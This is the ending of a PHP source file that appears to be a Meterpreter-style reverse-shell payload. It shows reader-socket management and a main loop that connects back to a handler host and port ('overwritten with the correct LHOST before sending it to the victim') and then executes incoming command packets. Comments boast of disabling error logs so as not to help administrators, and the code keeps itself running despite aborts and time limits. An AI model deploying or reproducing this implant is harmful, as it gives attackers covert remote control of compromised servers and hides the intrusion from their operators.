#my_print(sprintf("total: $count, Modified counts: r=%s w=%s e=%s", count($r), count($w), count($e)));
return $count;
}
function add_reader($resource) {
global $readers;
if (is_resource($resource) && !in_array($resource, $readers)) {
$readers[] = $resource;
}
}
function remove_reader($resource) {
global $readers;
if (in_array($resource, $readers)) {
foreach ($readers as $key => $r) {
if ($r == $resource) {
unset($readers[$key]);
}
}
}
}
##
# Main stuff
##
ob_implicit_flush();
# Turn off error reporting so we don't leave any ugly logs. Why make an
# administrator's job easier if we don't have to? =)
error_reporting(0);
#error_reporting(E_ALL);
@ignore_user_abort(true);
# Has no effect in safe mode, but try anyway
@set_time_limit(0);
# If we don't have a socket we're standalone, setup the connection here.
# Otherwise, this is a staged payload, don't bother connecting
if (!isset($msgsock)) {
# The payload handler overwrites this with the correct LHOST before sending
# it to the victim.
$ipaddr = '127.0.0.1';
$port = 4444;
if (FALSE !== strpos($ipaddr,":")) {
# ipv6 requires brackets around the address
$ipaddr = "[".$ipaddr."]";
}
$msgsock = connect($ipaddr, $port);
if (!$msgsock) { die(); }
} else {
switch ($msgsock_type) {
case 'socket':
register_socket($msgsock);
break;
case 'stream':
# fall through
default:
register_stream($msgsock);
}
}
add_reader($msgsock);
#
# Main dispatch loop
#
$r=$GLOBALS['readers'];
while (false !== ($cnt = select($r, $w=null, $e=null, 1))) {
#my_print(sprintf("Returned from select with %s readers", count($r)));
$read_failed = false;
for ($i = 0; $i < $cnt; $i++) {
$ready = $r[$i];
if ($ready == $msgsock) {
$request = read($msgsock, 8);
#my_print(sprintf("Read returned %s bytes", strlen($request)));
if (false==$request) {
#my_print("Read failed on main socket, bailing");
# We failed on the main socket. There's no way to continue, so
# break all the way out.
break 2;
}
$a = unpack("Nlen/Ntype", $request);
# length of the whole packet, including header
$len = $a['len'];
# packet type should always be 0, i.e. PACKET_TYPE_REQUEST
$ptype = $a['type'];
while (strlen($request) < $a['len']) {
$request .= read($msgsock, $len-strlen($request));
}
#my_print("creating response");
$response = create_response($request);
write($msgsock, $response);
} else {
my_print("not Msgsock: $ready");
$data = read($ready);
my_print(sprintf("Read returned %s bytes", strlen($data)));
if (false === $data) {
$request = handle_dead_resource_channel($ready);
write($msgsock, $request);
remove_reader($ready);
} elseif (strlen($data) == 0) {
remove_reader($ready);
} else {
$request = handle_resource_read_channel($ready, $data);
my_print("Got some data from a channel that needs to be passed back to the msgsock");
write($msgsock, $request);
}
}
}
$r = $GLOBALS['readers'];
} # end main loop
my_print("Finished");
close($msgsock);